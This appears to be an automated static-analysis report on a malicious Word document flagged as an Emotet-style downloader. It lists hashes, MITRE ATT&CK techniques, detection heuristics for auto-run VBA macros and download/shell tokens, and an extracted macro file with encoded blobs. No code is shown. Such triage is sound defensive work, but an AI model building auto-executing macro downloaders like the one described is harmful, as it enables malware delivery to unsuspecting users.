Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c55bc2af3e81e2e6…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 188.0 KB
Created: 2018-03-28 10:41:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 6bb049eb36257462d38683ff269e171e
SHA-1: 1274eb2a916c6a713b34bca1d953354230acad49
SHA-256: c55bc2af3e81e2e6719ec71435904239f9a01632e2dd72ea238ebc3e4a9cafb6
Risk Score: 244

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that calls CreateObject. Heuristics also flag a legacy WordBasic auto-exec marker and an Excel 4.0 (XLM) macro sheet. ClamAV identifies it as Doc.Malware.Emodldr-10025032-0, suggesting it acts as a downloader for a second-stage payload.

Heuristics (9)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present [medium] (OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 58983 bytes
SHA-256: cef7ed3e7cd7dd15880f3b104a26adb957c8d037d4773e7f39741e5f8f2464a3
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 18 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script